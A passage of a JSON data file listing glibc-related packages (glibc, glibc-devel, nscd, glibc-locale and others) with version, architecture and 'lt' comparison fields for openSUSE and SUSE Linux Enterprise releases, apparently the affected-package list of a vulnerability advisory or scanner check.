"arch": "s390x", "packageFilename": "glibc-devel-32bit-2.9-13.11.1.s390x.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "nscd-2.9-2.13.1.ppc.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-locale-64bit-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-locale-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-2.11.2-3.3.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-devel-32bit-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-locale-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-locale-2.9-2.13.1.i686.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "nscd-2.11.1-0.20.1.ppc64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "nscd-2.9-13.11.1.ppc64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-info-2.9-2.13.1.i686.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "nscd-2.9-13.11.1.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-obsolete-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-info-2.9-13.11.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "nscd-2.11.1-0.20.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-info-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-info-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-devel-64bit-2.9-2.13.1.ppc.rpm", "packageName": "glibc-devel-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-locale-x86-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-locale-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-html-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.1-0.20.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-locale-2.9-2.13.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-html-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-profile-32bit-2.9-13.11.1.s390x.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-profile-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-32bit-2.9-13.11.1.s390x.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-locale-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-obsolete-2.9-2.13.1.ppc.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-obsolete-2.9-2.13.1.i586.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "nscd-2.9-13.11.1.s390x.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-devel-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-debuginfo-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-info-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "nscd-2.11.1-0.20.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-devel-2.9-13.11.1.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-locale-x86-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-locale-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-info-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-profile-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-html-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-devel-2.9-13.11.1.s390x.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-profile-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-html-2.9-2.13.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "nscd-2.4-31.77.76.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-devel-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-devel-2.9-2.13.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-profile-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "nscd-2.9-13.11.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-html-2.9-2.13.1.i686.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-html-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-info-2.9-2.13.1.ppc.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-dceext-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-dceext", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "nscd-2.10.1-10.9.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-2.9-2.13.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-2.9-13.11.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-64bit-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-info-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-devel-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-32bit-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-info-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-devel-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-2.9-13.11.1.s390x.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-info-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-locale-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "nscd-2.11.1-0.20.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-profile-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-info-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-info-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-html-2.9-13.11.1.s390x.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-info-2.9-13.11.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-locale-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-2.10.1-10.9.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-html-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-x86-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-profile-32bit-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-devel-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i686", "packageFilename": "glibc-devel-2.4-31.77.76.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-devel-32bit-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-locale-2.9-13.11.1.s390x.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-i18ndata-2.9-2.13.1.ppc.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.9-2.13.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-devel-32bit-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-2.9-2.13.1.ppc.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-html-2.9-13.11.1.ia64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "nscd-2.11.1-0.20.1.s390x.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-i18ndata-2.9-13.11.1.ia64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "nscd-2.4-31.77.76.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-info-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-html-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "i586", "packageFilename": "glibc-html-2.10.1-10.9.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-html-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-2.11.1-0.20.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-i18ndata-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": 